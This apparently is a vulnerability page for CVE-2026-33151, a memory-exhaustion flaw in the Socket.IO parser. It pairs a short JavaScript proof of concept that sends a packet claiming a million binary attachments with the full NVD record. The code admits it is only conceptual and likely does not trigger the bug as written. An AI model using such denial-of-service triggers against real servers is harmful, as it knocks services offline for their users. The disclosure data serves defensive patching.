CVE-2026-33151

const io = require('socket.io-client'); // Target vulnerable Socket.IO server const targetUrl = 'http://localhost:3000'; const socket = io(targetUrl); socket.on('connect', () => { console.log('[+] Connected to server. Sending malicious packet...'); // Create a malicious payload claiming to have a large number of binary attachments // The server will allocate memory for these attachments but they might never arrive or be huge. const maliciousPacket = { type: 'binary', data: 'exploit', // This number triggers the buffer allocation on the server side num: 1000000 }; // In a real exploit, this would involve crafting the raw Socket.IO packet // to declare the number of binary items specifically. // This is a conceptual representation of the trigger. socket.emit('message', maliciousPacket); console.log('[+] Malicious packet sent. Check server memory usage.'); }); socket.on('disconnect', () => { console.log('[-] Disconnected from server.'); });

{"cve": {"id": "CVE-2026-33151", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:15.573", "lastModified": "2026-04-14T18:22:20.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6."}, {"lang": "es", "value": "Socket.IO es un framework de comunicación de código abierto, en tiempo real, bidireccional y basado en eventos. Antes de las versiones 3.3.5, 3.4.4 y 4.2.6, un paquete de Socket.IO especialmente diseñado puede hacer que el servidor espere un gran número de adjuntos binarios y los almacene en búfer, lo cual puede ser explotado para agotar la memoria del servidor. Este problema ha sido parcheado en las versiones 3.3.5, 3.4.4 y 4.2.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-754"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.3.5", "matchCriteriaId": "BBB43B3E-5E3E-4EDA-8748-E9DF4939767E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "3CF6E321-6910-4470-975B-E9D4C9ABF4E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.2.6", "matchCriteriaId": "6E19A7BD-B307-4907-B0DA-C7C826E682A3"}]}]}], "references": [{"url": "https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}